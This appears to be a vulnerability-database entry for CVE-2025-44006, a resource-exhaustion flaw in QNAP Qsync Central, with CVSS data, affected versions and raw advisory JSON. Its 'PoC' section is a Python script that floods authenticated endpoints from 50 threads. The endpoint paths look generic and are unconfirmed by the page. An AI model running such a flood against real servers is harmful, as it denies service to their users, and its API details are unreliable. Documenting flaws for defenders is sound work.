Security Vulnerability Report
中文
CVE-2025-44006 CVSS 6.5 MEDIUM

CVE-2025-44006

Published: 2025-10-03 18:15:35
Last Modified: 2025-10-08 15:19:31
Source: [email protected]

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: Qsync Central 5.0.0.1 ( 2025/07/09 ) and later

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qsync_central:*:*:*:*:*:*:*:* - VULNERABLE
QNAP Qsync Central < 5.0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-44006 - QNAP Qsync Central Resource Exhaustion PoC # Vulnerability: Allocation of Resources Without Limits or Throttling (CWE-770) # This PoC demonstrates resource exhaustion attack against Qsync Central import requests import threading import time TARGET_URL = "https://target-qnap:8080" USERNAME = "valid_user" PASSWORD = "user_password" def authenticate(session, url, username, password): """Authenticate to Qsync Central and obtain session cookie""" login_url = f"{url}/qsync/login" data = { "username": username, "password": password } response = session.post(login_url, data=data, verify=False) return response.status_code == 200 def exhaust_resources(session, url, thread_id): """Send rapid concurrent requests to exhaust server resources""" # Target resource-intensive endpoints endpoints = [ "/qsync/api/v1/sync/list", "/qsync/api/v1/file/list", "/qsync/api/v1/share/list" ] while True: for endpoint in endpoints: try: session.get(f"{url}{endpoint}", timeout=5) except Exception: pass def main(): session = requests.Session() if authenticate(session, TARGET_URL, USERNAME, PASSWORD): print("[+] Authentication successful") # Launch multiple threads to exhaust resources threads = [] for i in range(50): t = threading.Thread(target=exhaust_resources, args=(session, TARGET_URL, i)) t.daemon = True t.start() threads.append(t) print(f"[*] Launched {len(threads)} threads for resource exhaustion") time.sleep(3600) else: print("[-] Authentication failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-44006", "sourceIdentifier": "[email protected]", "published": "2025-10-03T18:15:35.223", "lastModified": "2025-10-08T15:19:30.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.1 ( 2025/07/09 ) and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qsync_central:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0.0", "versionEndExcluding": "5.0.0.1", "matchCriteriaId": "1CCFCB2F-05FA-460B-BD0D-966E7CE58D8A"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-34", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.